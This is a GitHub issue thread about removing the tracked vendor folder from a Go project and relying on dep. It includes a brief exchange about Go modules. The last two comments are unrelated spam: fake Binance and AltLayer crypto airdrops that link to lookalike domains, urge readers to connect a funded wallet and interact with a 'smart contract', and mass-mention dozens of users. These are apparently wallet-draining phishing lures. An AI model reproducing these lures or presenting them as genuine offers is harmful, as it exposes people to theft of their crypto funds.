### ISSUE TITLE
remove vendor folder in repo - use dep instead

### ISSUE THREAD

**Issue by mukeshmk** [Bunchhieng/hnreader#47]
Currently, the repo contains the vendor folder. Which need not be tracked by version control, as `Gopkg.toml` and `Gopkg.lock` files are used to track your dependencies. So please remove the vendor folder.

The vendor folder will be created with the same version of dependencies as specified in `Gopkg.toml`, upon running `dep init`.

**Comment by mukeshmk** [comment]
fixed it with the PR #48.

**Comment by 0xch4z** [comment]
Just curious, why would you use dep over official go 1.11 modules? (see: https://github.com/golang/dep/issues/1959#issuecomment-407947097)

**Comment by mukeshmk** [comment]
I agree this info (in the below-mentioned link) is old, but it is still valid:
This is the major difference as mentioned in the PR aka Doc-FAQ.
There is a subtle difference in what you are trying to achieve, that would be the key difference.

https://github.com/golang/dep/issues/376

**Comment by 0xch4z** [comment]
Right, but I'm not comparing dep to `go get`. I'm comparing it to [`go mod`](https://github.com/golang/go/tree/master/src/cmd/go/internal/modcmd), which versions packages in a go.mod file and creates a go.sum file to summarize dependency installation for reproducible builds.

**Comment by mukeshmk** [comment]
Are we using go mod here? 🤔

**Comment by 0xch4z** [comment]
No

**Comment by njangra144** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @josemb12, @mczy, @alexweissman, @xiilei, @rbatllet, @bethnull, @wavekasipat

**Comment by floatingdev** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

kocisov, @denysvitali, @iraquitan, @andreystarkov, @pmuller, @BDesselle, @radhanathdas, @vuiets, @adenot, @LanfordCai, @maogo, @bvolpato, @mmellau, @nicholas-l, @Ehrax, @danReynolds, @olejrosendahl, @abreksa4, @rmkrjy, @gardenbaum
